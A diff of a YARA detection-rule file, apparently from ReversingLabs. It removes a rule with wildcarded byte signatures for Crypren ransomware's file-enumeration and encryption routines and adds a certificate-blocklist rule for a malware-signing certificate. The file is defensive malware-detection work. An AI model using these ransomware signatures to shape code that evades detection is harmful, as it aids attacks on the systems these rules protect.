-            6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D
-            85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B
-            08 6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8
-            B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ??
-            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ??
-            81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
-        }
-		$encrypt_files_p4 = {
-            C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75
-            ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D
-            45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC
-            ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ??
-            ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
-            8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ??
-            ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ??
-            0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6
-            45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1
-            72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B
-        }
-		$encrypt_files_p5 = {
-            C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ??
-            ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ??
-            ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11
-            85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ??
-            ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83
-            F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ??
-            ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66
-            0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45
-        }
-		$encrypt_files_p6 = {
-            8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2
-            3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ??
-            ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85
-            ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ??
-            ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ??
-            8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66
-            0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81
-        }
-		$encrypt_files_p7 = {
-            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
-            8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
-            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ??
-            83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B
-        }
-		$encrypt_files_p8 = {
-            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
-            8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0
-            C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-        }
-		$encrypt_files_p9 = {
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AEEPZ Limited" and pe.signatures [ i ] . serial == "09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Crypren ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a6ff190-b26b-5b75-9103-95a3b2e80701"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16008-L16024"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crypren"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_directories_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-        }
-		$enum_directories_p2 = {
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6
-        }
-		$enum_directories_p3 = {
-            45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D
-            45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ??
-            8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ??
-            83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA
-            ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B
-            CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ??
-            ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
-            72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A
-            ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ??
-            0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B
-            94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ??
-            50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0
-            85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B
-            40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2
-        }
-		$encrypt_files_p2 = {
-            0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ??
-            ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
